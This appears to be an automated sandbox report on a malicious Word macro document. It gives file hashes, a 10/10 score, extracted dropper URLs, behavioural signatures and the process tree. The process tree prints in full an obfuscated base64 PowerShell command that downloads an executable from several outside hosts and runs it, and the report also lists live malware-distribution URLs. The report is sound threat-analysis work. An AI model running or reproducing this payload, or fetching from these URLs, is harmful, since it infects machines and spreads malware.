Analysis

  • max time kernel
    101s
  • max time network
    69s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 22:21

General

  • Target

    2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb.doc

  • Size

    249KB

  • MD5

    2065664436cf97b0a80afbd14bc08023

  • SHA1

    986b0c843ddb53b5591994f704d8466f4b36f441

  • SHA256

    2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb

  • SHA512

    3c3c37dc80eafb6cae956b54c46d0aaa9e74b55824bc0163210e4511ef9223516afa08f53dd85671c2a45c5fdd419e076362fc175bd2f0e98cd59165e1079148

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://sauloramos.com.br/PLcbM/4oxcev0320/

exe.dropper

http://jurczyk.biz/piotrek/IJilgckESlY/

exe.dropper

http://lidiscom.com.br/BKP_TinaPOS/CQSMl/

exe.dropper

http://cmswrexham.com/video/N2lzhgh45/

exe.dropper

http://lyveinc.com/wp-content/uploads/attachments/XxM/

exe.dropper

https://stateinsuranceonline.com/wp-content/yQzAGwyQs/

exe.dropper

https://www.teringieestatefarms.com.au/wp-content/Lvqg/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 13 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2361d0e1b933d0146c44874b661d74a11ac6152fc62a3cae8de22c8e0cc38cdb.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABJADYAMAByAF8AaABjAD0AKAAnAEgAJwArACgAJwBlAHYAJwArACcANQA2ADYAJwApACsAJwBuACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdABFAE0AcABcAHcAbwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQByAGUAQwB0AG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABDAFUAYABSAEkAVAB5AHAAcgBgAG8AdABgAE8AYwBPAGwAIgAgAD0AIAAoACcAdAAnACsAJwBsAHMAJwArACgAJwAxADIAJwArACcALAAgACcAKQArACcAdABsACcAKwAoACcAcwAxADEAJwArACcALAAnACsAJwAgAHQAJwApACsAJwBsAHMAJwApADsAJABOAG0AcABlADkAcQB1ACAAPQAgACgAJwBQAG8AJwArACcAaABhACcAKwAnAGUAbgAnACkAOwAkAFAAaQBqAGIAeAB3ADcAPQAoACgAJwBQACcAKwAnAG0ANQBkACcAKQArACcAMwAnACsAJwBsAG8AJwApADsAJABHAGMAcAB0AG4AZgByAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwB7ADAAfQAnACsAKAAnAHcAbwAnACsAJwByACcAKQArACcAZAB7ADAAJwArACcAfQAyADAAMQA5AHsAJwArACcAMAB9ACcAKQAgACAALQBmACAAWwBjAGgAQQByAF0AOQAyACkAKwAkAE4AbQBwAGUAOQBxAHUAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEIAYQByAGkAaQB2AHkAPQAoACgAJwBSACcAKwAnADAAbgAnACkAKwAnAHQAdQAnACsAJwBqAHQAJwApADsAJABKAHIAbwBxAGQAdAA3AD0ALgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAHcARQBiAGMATABpAEUATgBUADsAJABUADEAdQB0AF8AYQBfAD0AKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAA6ACcAKQArACcALwAvACcAKwAoACcAcwBhAHUAbAAnACsAJwBvACcAKQArACgAJwByAGEAbQBvAHMALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAuAGIAcgAvAFAAJwArACcATAAnACsAJwBjAGIAJwApACsAJwBNACcAKwAoACcALwAnACsAJwA0AG8AeABjAGUAJwArACcAdgAwADMAJwApACsAKAAnADIAMAAnACsAJwAvACoAJwApACsAJwBoACcAKwAoACcAdAB0AHAAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGoAdQAnACsAJwByAGMAJwApACsAJwB6ACcAKwAnAHkAawAnACsAKAAnAC4AJwArACcAYgBpAHoAJwApACsAJwAvAHAAJwArACgAJwBpAG8AdAAnACsAJwByAGUAJwApACsAKAAnAGsALwBJACcAKwAnAEoAaQBsAGcAYwAnACkAKwAoACcAawBFAFMAbABZACcAKwAnAC8AKgAnACsAJwBoACcAKQArACcAdAB0ACcAKwAnAHAAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBsACcAKwAnAGkAZAAnACkAKwAnAGkAJwArACcAcwAnACsAKAAnAGMAJwArACcAbwAnACsAJwBtAC4AYwBvAG0AJwApACsAKAAnAC4AYgAnACsAJwByACcAKQArACgAJwAvAEIAJwArACcASwBQACcAKQArACgAJwBfAFQAaQAnACsAJwBuAGEAUABPAFMALwBDACcAKwAnAFEAUwBNACcAKQArACgAJwBsAC8AJwArACcAKgAnACkAKwAoACcAaAAnACsAJwB0AHQAcAA6AC8AJwApACsAKAAnAC8AYwAnACsAJwBtACcAKQArACgAJwBzAHcAJwArACcAcgBlACcAKQArACgAJwB4ACcAKwAnAGgAYQAnACkAKwAnAG0AJwArACcALgAnACsAJwBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdgBpAGQAZQAnACsAJwBvAC8AJwApACsAKAAnAE4AMgAnACsAJwBsAHoAJwApACsAJwBoACcAKwAnAGcAJwArACcAaAA0ACcAKwAoACcANQAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAnACkAKwAoACcALwAvAGwAJwArACcAeQAnACkAKwAnAHYAZQAnACsAKAAnAGkAbgAnACsAJwBjAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBjAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACcAKQArACcALwB1ACcAKwAoACcAcABsAG8AYQAnACsAJwBkACcAKwAnAHMAJwApACsAKAAnAC8AYQB0AHQAJwArACcAYQBjAGgAJwApACsAKAAnAG0AZQBuACcAKwAnAHQAcwAvACcAKwAnAFgAeABNAC8AKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAcwAnACsAKAAnADoALwAnACsAJwAvACcAKQArACcAcwB0ACcAKwAoACcAYQAnACsAJwB0AGUAJwApACsAJwBpACcAKwAnAG4AJwArACcAcwB1ACcAKwAoACcAcgBhAG4AJwArACcAYwBlACcAKQArACgAJwBvAG4AJwArACcAbAAnACkAKwAoACcAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYwAnACkAKwAnAG8AbgAnACsAKAAnAHQAZQAnACsAJwBuAHQALwB5AFEAegBBACcAKwAnAEcAJwApACsAKAAnAHcAJwArACcAeQBRAHMAJwArACcALwAqAGgAJwApACsAKAAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAHcAdwAnACsAJwB3AC4AdAAnACkAKwAoACcAZQAnACsAJwByAGkAbgBnACcAKQArACcAaQAnACsAKAAnAGUAZQBzACcAKwAnAHQAJwApACsAKAAnAGEAdABlAGYAJwArACcAYQAnACkAKwAnAHIAbQAnACsAKAAnAHMALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALgBhAHUALwAnACkAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AJwArACcAYwBvAG4AdAAnACkAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwBMACcAKwAnAHYAJwApACsAKAAnAHEAJwArACcAZwAvACcAKQApAC4AIgBzAHAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFoAMQBuAGoAMgBnAHAAPQAoACgAJwBLAHoAJwArACcAXwBzACcAKQArACgAJwBiADIAJwArACcAdwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEEANwBzAHAAdwBrADcAIABpAG4AIAAkAFQAMQB1AHQAXwBhAF8AKQB7AHQAcgB5AHsAJABKAHIAbwBxAGQAdAA3AC4AIgBkAG8AVwBOAEwAbwBgAEEAYABEAGYASQBsAGUAIgAoACQAQQA3AHMAcAB3AGsANwAsACAAJABHAGMAcAB0AG4AZgByACkAOwAkAEYAbgBlAGEAeQBlADgAPQAoACgAJwBPADUAJwArACcAbgAnACkAKwAoACcAeQAnACsAJwBqAG0ANwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABHAGMAcAB0AG4AZgByACkALgAiAGwARQBgAE4ARwB0AEgAIgAgAC0AZwBlACAAMgA2ADcAOQA4ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlAC0AJwArACcASQB0AGUAJwArACcAbQAnACkAKAAkAEcAYwBwAHQAbgBmAHIAKQA7ACQARwBkAGIAMABmAGoANwA9ACgAKAAnAEMAJwArACcANQB1AHcAJwApACsAKAAnAGYAcAAnACsAJwA4ACcAKQApADsAYgByAGUAYQBrADsAJABRAG0AZwBlAHMAOQA3AD0AKAAnAEoAegAnACsAKAAnADkANAAnACsAJwAzAGUAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQB5ADMAeQB1ADQAYwA9ACgAJwBHAHEAJwArACgAJwB1AGsAJwArACcAbgBvAHAAJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1860

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1512-86-0x0000000000000000-mapping.dmp
    • memory/1792-70-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-62-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-57-0x0000000076461000-0x0000000076463000-memory.dmp
      Filesize

      8KB

    • memory/1792-71-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-59-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-60-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-61-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-72-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-63-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-64-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-65-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-66-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-67-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-73-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-69-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-54-0x0000000072FD1000-0x0000000072FD4000-memory.dmp
      Filesize

      12KB

    • memory/1792-58-0x0000000071A3D000-0x0000000071A48000-memory.dmp
      Filesize

      44KB

    • memory/1792-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1792-68-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-76-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-75-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-74-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-78-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-77-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-79-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-80-0x0000000000555000-0x000000000055E000-memory.dmp
      Filesize

      36KB

    • memory/1792-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1792-55-0x0000000070A51000-0x0000000070A53000-memory.dmp
      Filesize

      8KB

    • memory/1860-83-0x0000000002974000-0x0000000002977000-memory.dmp
      Filesize

      12KB

    • memory/1860-84-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
      Filesize

      3.0MB

    • memory/1860-85-0x000000000297B000-0x000000000299A000-memory.dmp
      Filesize

      124KB

    • memory/1860-82-0x000007FEF3FC0000-0x000007FEF4B1D000-memory.dmp
      Filesize

      11.4MB

    • memory/1860-81-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp
      Filesize

      8KB